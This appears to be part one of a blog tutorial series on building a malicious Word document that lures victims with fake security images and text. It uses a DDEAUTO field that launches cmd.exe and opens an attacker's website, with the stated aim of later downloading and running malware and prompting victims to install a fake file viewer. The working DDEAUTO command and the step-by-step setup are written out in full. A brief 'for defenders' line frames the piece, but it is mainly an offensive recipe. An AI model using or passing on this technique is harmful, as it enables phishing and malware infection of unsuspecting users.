In this new series we are going to be making a malicious Word document, which will connect to our malicious site and automatically run malicious code to give us access to the victim, but also give us a fall back where the user is also prompted to install a secure file viewer should our automatic code not run. This gives us 2 chances to infect the victim machine.
Office documents allow us to execute code, in the same way as a website would, so using some simple scripting we can create a document which when opened auto prompts the user to click a pop up, and then automatically connect to our malicious website to download and run Malware.
If you are a defender the most important thing to understand is how attacks like this work so you know what you are looking out for. With that in mind, let’s go make some Malware.
In part one we are only creating the document itself, adding some images and text to try and socially engineer the victim user into thinking it is legitimate and click the pop up box. Also to test that the script works and opens a website. In this demo we will be using http://legitimate.website.com which is just a test site for this demo, so you will need a different website to open. At this point we are just testing the script opens a web page so if you don’t have a website you can just use https://google.com.
What you need;
- Microsoft Word
- Some free security images downloaded from the internet
- Some made up text to put in the document
- A Windows pop up screenshot
- This piece of code; DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “
- Less than 5 minutes.
Open up Word and create a simple looking document which will tempt your victim to accept the pop up when they see it. Pop some images in, and be creative with the text in the document. Ours is shown below.
Now we need to insert the script which will open the website when the pop up is clicked.
Move the cursor down the page and then click “Insert” from the ribbon menu, then “quick parts” then “Field” from the drop down menu. Ensure “=(Formula)” is selected then click OK.
Then you should see the below in your document. This is our formula field
Right click and choose “Toggle Field Code”
Then you’ll see this;
Clear the code and insert our code as shown
DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “
Save and close the document, then to test re open on your machine. If the website opens as in the video you are ready to move on to the next step.